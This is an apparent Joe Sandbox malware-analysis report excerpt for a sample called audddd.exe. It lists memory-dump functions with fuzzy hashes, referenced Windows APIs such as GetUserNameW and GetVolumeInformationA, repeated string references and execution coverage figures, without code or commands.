Opcode Fuzzy Hash: 89d44211d3be4bdcde001373bbbbb964561bba26b09c2b9630f6178368c88fe5
Instruction Fuzzy Hash: B1210671A04281DFDB06CF14D9C0B66BFA5EF88314F24C5A9EC494B246C37AD456CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02BBD3B4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.821277598.0000000002BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2bbd000_audddd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11ccbb1f15bcd7a024cff09c23f68555c8e014ff6724f3f8791225f56f9278b3
Instruction ID: a08a18a7c5737653b77e60bac7f5b4270fe8c8d903a6efada4b2c4d030621eb8
Opcode Fuzzy Hash: 11ccbb1f15bcd7a024cff09c23f68555c8e014ff6724f3f8791225f56f9278b3
Instruction Fuzzy Hash: 5E212571504241DFDB0ADF14D9C0B66BFA5FF84324F28C5E9E8094B256C37AE456CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02BCE2E1 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.821292416.0000000002BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2bcd000_audddd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76673d23f2f6c46adc40ac70910671e75508e2f83f0353f0583a0b4a86584c03
Instruction ID: 9a7a83a9e0d7c8cd7c41ecf525b1ea2abbe6225ef3b6bc3d36903ce9a1d76cfd
Opcode Fuzzy Hash: 76673d23f2f6c46adc40ac70910671e75508e2f83f0353f0583a0b4a86584c03
Instruction Fuzzy Hash: 3C217475509380DFC706CF24D990715BF71EB86214F28C5EAD8458F697C33AD856CB62

Uniqueness

Uniqueness Score: -1.00%

Function 02BCE31C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.821292416.0000000002BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2bcd000_audddd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba4ea9d17e4a9b029adb966939b5dc7fd6c8cdd23db0af9591f0fc26eeb1501d
Instruction ID: d5eec5d1734befa0c915966da05181df5fbfbde4d8fcdafc16ab04c05f22c1fb
Opcode Fuzzy Hash: ba4ea9d17e4a9b029adb966939b5dc7fd6c8cdd23db0af9591f0fc26eeb1501d
Instruction Fuzzy Hash: ED21B075604240EFDB06DF14D9C0B26BBA5EB84324F34C5ADE84A4B256C73AE846CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 02BBD1D3 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.821277598.0000000002BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2bbd000_audddd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7293a8a996a9933c11cb2e358c381ae75aadffb26ef6baec95c3adea0869ec6
Instruction ID: f407c00e3ccf9e9691e21d9a1dbd4e5b1ed37134d760c0c008afa556e6b8dbc6
Opcode Fuzzy Hash: f7293a8a996a9933c11cb2e358c381ae75aadffb26ef6baec95c3adea0869ec6
Instruction Fuzzy Hash: 0521AC76904280CFCB06CF00D9C4B66BF61FF84310F2486A9DC480A656C33AD46ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02BBD3AF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.821277598.0000000002BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2bbd000_audddd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2f04dc84d66a0d42e145680352e01869c8a854c043734d5ebef4747bd96dbcb
Instruction ID: 86fdf5b1015aaf1ed7e0348793686f509f3b9198c7688cebae2636b75e693b83
Opcode Fuzzy Hash: f2f04dc84d66a0d42e145680352e01869c8a854c043734d5ebef4747bd96dbcb
Instruction Fuzzy Hash: A311AC76504280CFDB16CF10D9C4B66BF71FB84324F28C6E9D8494B616C33AE45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: audddd.exePID: 7812, Parent PID: 2216COMMON

Execution Graph

Execution Coverage:	18%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	546
Total number of Limit Nodes:	29

Executed Functions

Function 07130040 Relevance: 96.4, APIs: 6, Strings: 45, Instructions: 7132COMMON

Download Yara Rule

Strings

PHXq, xrefs: 0713644A
PHXq, xrefs: 07131E8C
PHXq, xrefs: 07137411
PHXq, xrefs: 07130E7E
PHXq, xrefs: 071314AC
PHXq, xrefs: 07130804
PHXq, xrefs: 07133C3B
PHXq, xrefs: 0713489E
PHXq, xrefs: 071373FD
PHXq, xrefs: 07131B26
PHXq, xrefs: 0713251E
PHXq, xrefs: 0713645E
PHXq, xrefs: 07132BCE
PHXq, xrefs: 071321D5
PHXq, xrefs: 07133889
PHXq, xrefs: 071360F5
PHXq, xrefs: 071370A8
PHXq, xrefs: 07132865
PHXq, xrefs: 0713049D
PHXq, xrefs: 071317E9
PHXq, xrefs: 07133FAA
PHXq, xrefs: 07133F96
PHXq, xrefs: 071367B3
PHXq, xrefs: 07134549
PHXq, xrefs: 0713250A
PHXq, xrefs: 0713455D
PHXq, xrefs: 071321C1
PHXq, xrefs: 07136109
PHXq, xrefs: 07132879
PHXq, xrefs: 071370BC
PHXq, xrefs: 07133216
PHXq, xrefs: 07133202
PHXq, xrefs: 0713679F
PHXq, xrefs: 07135199
LRXq, xrefs: 07130097
PHXq, xrefs: 07132BBA
PHXq, xrefs: 071348B2
PHXq, xrefs: 071351AD
PHXq, xrefs: 07133C4F
PHXq, xrefs: 07133875
LRXq, xrefs: 0713006C
PHXq, xrefs: 07130B41
PHXq, xrefs: 07131E78
PHXq, xrefs: 0713580E
PHXq, xrefs: 071357FA

Memory Dump Source

Source File: 00000012.00000002.1133284280.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7130000_audddd.jbxd

Similarity

API ID:
String ID: LRXq$LRXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq$PHXq
API String ID: 0-3597570233
Opcode ID: 7b32d1703b7e3ee480d2a3d4badf23116ee699d8dad0d56b2ce7e4141c04a673
Instruction ID: 5a7c960d4a74d6ee364cd2acb1a9a03d3c27fe5b387c9d48bb1796e5d0b4a2f4
Opcode Fuzzy Hash: 7b32d1703b7e3ee480d2a3d4badf23116ee699d8dad0d56b2ce7e4141c04a673
Instruction Fuzzy Hash: 42D33874B002198FCB59EB25D9A4B6E76F6FF88700F1485A9E80997398DF349D81CF81

Uniqueness

Uniqueness Score: -1.00%

Function 06973BE0 Relevance: 2.4, APIs: 1, Instructions: 877COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 06973DCF

Memory Dump Source

Source File: 00000012.00000002.1132647461.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6970000_audddd.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: af0415f0122292d768a4710621774b61b5bdad73db9f1ea75523495662c0ed92
Instruction ID: 74fd3693c5ff499fb7e3376555fe2e4c03355581df73304751bf7335d9648fcd
Opcode Fuzzy Hash: af0415f0122292d768a4710621774b61b5bdad73db9f1ea75523495662c0ed92
Instruction Fuzzy Hash: 2662C030B002459FDB59AB78D86436E3AE7AFC5704F28846DD80ACB795DF359C02CB96

Uniqueness

Uniqueness Score: -1.00%

Function 06973BD1 Relevance: 2.2, APIs: 1, Instructions: 679COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 06973DCF

Memory Dump Source

Source File: 00000012.00000002.1132647461.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6970000_audddd.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: f4b5011856b79c37ec3e3e13c27a4e151bc67e9fa6313545010643abf853a9ac
Instruction ID: 9497af891f055d9c6cdfb875a07777f0aaff355113c195901f094a652d80a797
Opcode Fuzzy Hash: f4b5011856b79c37ec3e3e13c27a4e151bc67e9fa6313545010643abf853a9ac
Instruction Fuzzy Hash: CD32BE307002059FDB59BB74986837E3AA7EFC4644F28846DD80ACB799DF359C02DB96

Uniqueness

Uniqueness Score: -1.00%

Function 0639C969 Relevance: 1.8, APIs: 1, Instructions: 341libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0639C9CC

Memory Dump Source

Source File: 00000012.00000002.1132359098.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6390000_audddd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fa470e0e93ca8e12ff7b8858359cffb52e5c93304a5d947d2f995f28316ac152
Instruction ID: 949b22dfceafa54238afc38dc96412d8d8e205741cfc94c81f781ea4889b2980
Opcode Fuzzy Hash: fa470e0e93ca8e12ff7b8858359cffb52e5c93304a5d947d2f995f28316ac152
Instruction Fuzzy Hash: CBD16330B002198BCF48EBB9D8946ADBBB2FF84305F149519E445EB355DB35AC91CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0639C978 Relevance: 1.8, APIs: 1, Instructions: 339libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0639C9CC

Memory Dump Source

Source File: 00000012.00000002.1132359098.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6390000_audddd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 69c1b7a2b17c63bbbf3f41c01bc1ec469b5b6a9c46dee41c6f937ba917169b16
Instruction ID: 20f334c8db686d495e581bbef0a79b87bf3ea5b30d09c67969a364b107c76fff
Opcode Fuzzy Hash: 69c1b7a2b17c63bbbf3f41c01bc1ec469b5b6a9c46dee41c6f937ba917169b16
Instruction Fuzzy Hash: 41D16130B002198BCF48EBB9D8946ADBBB2FF84305F149529E446EB395DB35AC51CF91

Uniqueness

Uniqueness Score: -1.00%

Function 071351CB Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 247libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 07135215
LdrInitializeThunk.NTDLL ref: 071352CA

Strings

PHXq, xrefs: 0713580E
PHXq, xrefs: 071357FA

Memory Dump Source

Source File: 00000012.00000002.1133284280.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7130000_audddd.jbxd

Similarity

API ID: InitializeThunk
String ID: PHXq$PHXq
API String ID: 2994545307-1791113692
Opcode ID: cc1db8f604aaa00752959923d3cb4555ec4b18f5efd7450b3214f9f9cb28706d
Instruction ID: 9e7d29d5c00fd3035da0f7b866f0859e4f7afac4e359b0033284f6d850afb620
Opcode Fuzzy Hash: cc1db8f604aaa00752959923d3cb4555ec4b18f5efd7450b3214f9f9cb28706d
Instruction Fuzzy Hash: D1A13D74B012198FDB18AB35D9A476E76B7FF88700F1485A9E80997398DF349D81CF80

Uniqueness

Uniqueness Score: -1.00%

Function 071351C2 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 07135215
LdrInitializeThunk.NTDLL ref: 071352CA

Strings

PHXq, xrefs: 0713580E
PHXq, xrefs: 071357FA

Memory Dump Source

Source File: 00000012.00000002.1133284280.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7130000_audddd.jbxd

Similarity

API ID: InitializeThunk
String ID: PHXq$PHXq
API String ID: 2994545307-1791113692
Opcode ID: 096d8e7fcb9443c144ba2b654ad7fde2413aa9e73ee62c5280f6668c68438525
Instruction ID: 16ca195a3efa94b6e0864517ab6392dd1ae80f46e79a9de043d8b54717d2d4c6
Opcode Fuzzy Hash: 096d8e7fcb9443c144ba2b654ad7fde2413aa9e73ee62c5280f6668c68438525
Instruction Fuzzy Hash: 24A14D74B0121A8FDB189B35D9A476E7AB7FF88700F1485A9E80997388DF349D81CF80

Uniqueness

Uniqueness Score: -1.00%

Function 069722A5 Relevance: 6.2, APIs: 4, Instructions: 176
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 06972356
GetCurrentThread.KERNEL32 ref: 06972393
GetCurrentProcess.KERNEL32 ref: 069723D0
GetCurrentThreadId.KERNEL32 ref: 06972429

Memory Dump Source

Source File: 00000012.00000002.1132647461.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6970000_audddd.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 8da91dcfc5b883137d9867294ec252d4ca696e0672dfcf73259c10c7ea9362c6
Instruction ID: 2a4e0e1ad707d3aae33006af6d60e5957767a98ae922e11fa03d2a2a647b108f
Opcode Fuzzy Hash: 8da91dcfc5b883137d9867294ec252d4ca696e0672dfcf73259c10c7ea9362c6
Instruction Fuzzy Hash: DF711FB09143898FCB15CFA9D9487DEBFF0EF89304F24849EE049AB661D7349945CB25

Uniqueness

Uniqueness Score: -1.00%

Function 069722D8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 06972356
GetCurrentThread.KERNEL32 ref: 06972393
GetCurrentProcess.KERNEL32 ref: 069723D0
GetCurrentThreadId.KERNEL32 ref: 06972429

Memory Dump Source

Source File: 00000012.00000002.1132647461.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6970000_audddd.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: e45b98abebd9b3b49e315e1200628118a81ad082f387c593115bc4f478a2be0d
Instruction ID: 5b258d399c5f8b906d3d8906566abfa07f497a61565a23c3436015b3db8abfaa
Opcode Fuzzy Hash: e45b98abebd9b3b49e315e1200628118a81ad082f387c593115bc4f478a2be0d
Instruction Fuzzy Hash: 1E5167B09103098FDB54CFAAD988B9EBFF5EF88304F20C459E01AA7760D7349985CB65

Uniqueness

Uniqueness Score: -1.00%

Function 06399F28 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 433
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0639A397

Strings

LRXq, xrefs: 0639A3CE
LRXq, xrefs: 0639A433

Memory Dump Source

Source File: 00000012.00000002.1132359098.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6390000_audddd.jbxd

Similarity

API ID: InitializeThunk
String ID: LRXq$LRXq
API String ID: 2994545307-3325258715
Opcode ID: 8dac4e5b79f89ee2dc2f293b879532b06f2dea12c666c1f4fe880ab1b8425022
Instruction ID: 629a98f79da86ea8216860189d789f7070bd503c7f6d04c1820fb64644c9d0c0
Opcode Fuzzy Hash: 8dac4e5b79f89ee2dc2f293b879532b06f2dea12c666c1f4fe880ab1b8425022
Instruction Fuzzy Hash: 04F15030B002059FCB49EFB5D994AAEB7F2FF88300F248569D4169B395DB359C46CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 07133FC8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 215COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 07133FEB

Strings

PHXq, xrefs: 07134549
PHXq, xrefs: 0713455D

Memory Dump Source

Source File: 00000012.00000002.1133284280.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7130000_audddd.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID: PHXq$PHXq
API String ID: 6842923-1791113692
Opcode ID: aaa0bb35d32cd9de4cc7e230908943407b2d730bde0ca5e9fbd066c7d024ffd2
Instruction ID: 439650d6b5aa487a7eeef82e2df3a08c39faa15e4b86e6a54a1cb2fd1282d188
Opcode Fuzzy Hash: aaa0bb35d32cd9de4cc7e230908943407b2d730bde0ca5e9fbd066c7d024ffd2
Instruction Fuzzy Hash: 5B815E74B012158FDB189B35DDA476E76F6FF84601F1485A9E809E7398DF348E81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 07133FBF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 210COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 07133FEB

Strings

PHXq, xrefs: 07134549
PHXq, xrefs: 0713455D

Memory Dump Source

Source File: 00000012.00000002.1133284280.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7130000_audddd.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID: PHXq$PHXq
API String ID: 6842923-1791113692
Opcode ID: 479c7ff8243a55b901d12b89e51244e14e869e1e744328aa2db81b9f4a6bd926
Instruction ID: d79c187571411fbf25b4a5483a1e520e6a15b1a235667a84eea63891b4e75043
Opcode Fuzzy Hash: 479c7ff8243a55b901d12b89e51244e14e869e1e744328aa2db81b9f4a6bd926
Instruction Fuzzy Hash: 09816D74B012158FDB189B25DDA476EB6F7FF84601F1484A9E90AE7398DF348E81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 07134E76 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 139libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 07134E99
LdrInitializeThunk.NTDLL ref: 07135215
LdrInitializeThunk.NTDLL ref: 071352CA

Strings

PHXq, xrefs: 07135199
PHXq, xrefs: 071351AD

Memory Dump Source

Source File: 00000012.00000002.1133284280.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7130000_audddd.jbxd

Similarity

API ID: InitializeThunk$DispatcherExceptionUser
String ID: PHXq$PHXq
API String ID: 48014773-1791113692
Opcode ID: db745d738f72a9a00ae299b03e1c0583f289ad23595a69b13907c3f0a8c62f7c
Instruction ID: 08a21b2012e5472b40387699f45d996de5d05b8d793072f04ef0e3db7507e5c9
Opcode Fuzzy Hash: db745d738f72a9a00ae299b03e1c0583f289ad23595a69b13907c3f0a8c62f7c
Instruction Fuzzy Hash: 3D515074B012198FDB68AB35DD6476E76F7BF84600F1484A9E40AE7398DF348D91CB90

Uniqueness

Uniqueness Score: -1.00%

Function 07135DD2 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 07135DF5

Strings

PHXq, xrefs: 071360F5
PHXq, xrefs: 07136109

Memory Dump Source

Source File: 00000012.00000002.1133284280.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7130000_audddd.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID: PHXq$PHXq
API String ID: 6842923-1791113692
Opcode ID: bf4da2d1356106dc00b42c35c6cfcfe8bac3116039a75837f871216f87da9e02
Instruction ID: e7cf451b47a7d4a4e827f63f084e6d9bc2fd525e5b3b01ed966dbcfe416e617b
Opcode Fuzzy Hash: bf4da2d1356106dc00b42c35c6cfcfe8bac3116039a75837f871216f87da9e02
Instruction Fuzzy Hash: F5514E74B002199FDB69AB75D9A476E7AF6BF88700F1484A9E409E7288DF349D41CF80

Uniqueness

Uniqueness Score: -1.00%

Function 07134E6D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 07134E99
LdrInitializeThunk.NTDLL ref: 07135215
LdrInitializeThunk.NTDLL ref: 071352CA

Strings

PHXq, xrefs: 07135199
PHXq, xrefs: 071351AD

Memory Dump Source

Source File: 00000012.00000002.1133284280.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7130000_audddd.jbxd

Similarity

API ID: InitializeThunk$DispatcherExceptionUser
String ID: PHXq$PHXq
API String ID: 48014773-1791113692
Opcode ID: da124bf8025667048b5052087f6b0ae3c94c4ed1164917d2432af88a28f1b3a8
Instruction ID: f421d4754f22a2625798b6a9d774c12395b4046b9ac3d4fc4d9bb2c3c182112a
Opcode Fuzzy Hash: da124bf8025667048b5052087f6b0ae3c94c4ed1164917d2432af88a28f1b3a8
Instruction Fuzzy Hash: E9514F7470521A8FDB289B35D96476E76F7BF84601F14C469E80AD7398DF348D91CB80

Uniqueness

Uniqueness Score: -1.00%

Function 07135DC9 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 07135DF5

Strings

PHXq, xrefs: 071360F5
PHXq, xrefs: 07136109

Memory Dump Source

Source File: 00000012.00000002.1133284280.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7130000_audddd.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID: PHXq$PHXq
API String ID: 6842923-1791113692
Opcode ID: 7d132ff770b37c4f42ce204e9c2af086b94d7d22a1604b1d928cf2547c2d2310
Instruction ID: b7de9a30102d3c96145c9dbde68670af7faef43b3ca68a5de6282dc50009dee6
Opcode Fuzzy Hash: 7d132ff770b37c4f42ce204e9c2af086b94d7d22a1604b1d928cf2547c2d2310
Instruction Fuzzy Hash: 77515F74B052199FDB29AB25D9A476E7AF6FF88700F148469E40AD7388DF349D41CF80

Uniqueness

Uniqueness Score: -1.00%

Function 02EBD010 Relevance: 1.8, APIs: 1, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1129943300.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2eb0000_audddd.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 665abdce7cfa6936ebcb737246a9bb57288d411fc747c07bf4be82cbad764bd4
Instruction ID: 22d4ca59804eaef73f3fdd0ea856c2393c8b419a4ef1ff6956bfd3c81686ed4b
Opcode Fuzzy Hash: 665abdce7cfa6936ebcb737246a9bb57288d411fc747c07bf4be82cbad764bd4
Instruction Fuzzy Hash: B9C1AD70A047469FCB15DF79C88069EBBF2FF88304B10952AD44ADB755DB74E942CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0639B420 Relevance: 1.7, APIs: 1, Instructions: 175libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0639B45F

Memory Dump Source

Source File: 00000012.00000002.1132359098.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6390000_audddd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6b98ba767b8d7f440dcbfb049bd11939318cb5c9e3bb84106b27177fe97ad7a2
Instruction ID: ac9290eec90195b97d21180244307d8809e59b2ad1611b48ad0dca5850f57952
Opcode Fuzzy Hash: 6b98ba767b8d7f440dcbfb049bd11939318cb5c9e3bb84106b27177fe97ad7a2
Instruction Fuzzy Hash: 39612A30A10209DFDF59EF65E994BAFB7B6EF84300F108428E402A7395DB79A845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02EBD544 Relevance: 1.7, APIs: 1, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1129943300.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2eb0000_audddd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7da4f7345a9350f1ff53fd206534e54643db984c6a0ee187afa049075ce73e6c
Instruction ID: 3b72f048546d9041314089952a385f63ec8e1e6c1aceb85937b7a5e82c4aab2b
Opcode Fuzzy Hash: 7da4f7345a9350f1ff53fd206534e54643db984c6a0ee187afa049075ce73e6c
Instruction Fuzzy Hash: E06168B1C41349DFCF16CFAAD8806DEBFB1AF49318F28915AE414AB221D7749849CF94

Uniqueness

Uniqueness Score: -1.00%

Function 02EBE780 Relevance: 1.7, APIs: 1, Instructions: 165COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02EBE90A

Memory Dump Source

Source File: 00000012.00000002.1129943300.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2eb0000_audddd.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: c6b5e402df972d796928b1883ec383a33d8d2c3b7a1353d3cf07e86aec0a4236
Instruction ID: d8eb52aec9d7b32daea4cb35e66936cd4de8673e984b61117bdc27b4b2e82fad
Opcode Fuzzy Hash: c6b5e402df972d796928b1883ec383a33d8d2c3b7a1353d3cf07e86aec0a4236
Instruction Fuzzy Hash: 75610271C00249AFCF16CFA9C880ACEBFB6FF49314F58916AE518AB221D7719855CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0639CEFC Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

GetVolumeInformationA.KERNEL32(?,?,?,?,?,?,?,?), ref: 0639D004

Memory Dump Source

Source File: 00000012.00000002.1132359098.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6390000_audddd.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 7b55381f2e7ad867bd6421776004413549ab49d27d25ff8d67a67fb718632141
Instruction ID: 5d7db5489901bce7ee1ecb2169a351c35f3902120a556c6532cca3d66077346c
Opcode Fuzzy Hash: 7b55381f2e7ad867bd6421776004413549ab49d27d25ff8d67a67fb718632141
Instruction Fuzzy Hash: 5451C0B0D002589FDB14CFA9CA84BCDBBF5BF48314F608129E408AB355DB75A949CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02EBAC64 Relevance: 1.6, APIs: 1, Instructions: 134COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,00000000), ref: 02EBADAB

Memory Dump Source

Source File: 00000012.00000002.1129943300.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2eb0000_audddd.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: b531a167595f6013ad321fd6a4b9711732cd0bd8d063f596e13734c768b6e5bb
Instruction ID: 1d6d6310153cae42113af37196b04fdcb748eb1fea3e4678e00b0171b3e6e677
Opcode Fuzzy Hash: b531a167595f6013ad321fd6a4b9711732cd0bd8d063f596e13734c768b6e5bb
Instruction Fuzzy Hash: 665115B4E002198FDF15CFA9C885BDEBBB1BF48308F14952AE815AB350DB749844CF95

Uniqueness

Uniqueness Score: -1.00%

Function 02EBAC70 Relevance: 1.6, APIs: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,00000000), ref: 02EBADAB

Memory Dump Source

Source File: 00000012.00000002.1129943300.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2eb0000_audddd.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 5babd18166de8614292acc1d801cdf2448cbc7d786a17319c3ca14f36598e7f9
Instruction ID: f5d3fd5ff760e015982ee750318bd0f66501a6ce6d412ed90b11a26baf5a06f4
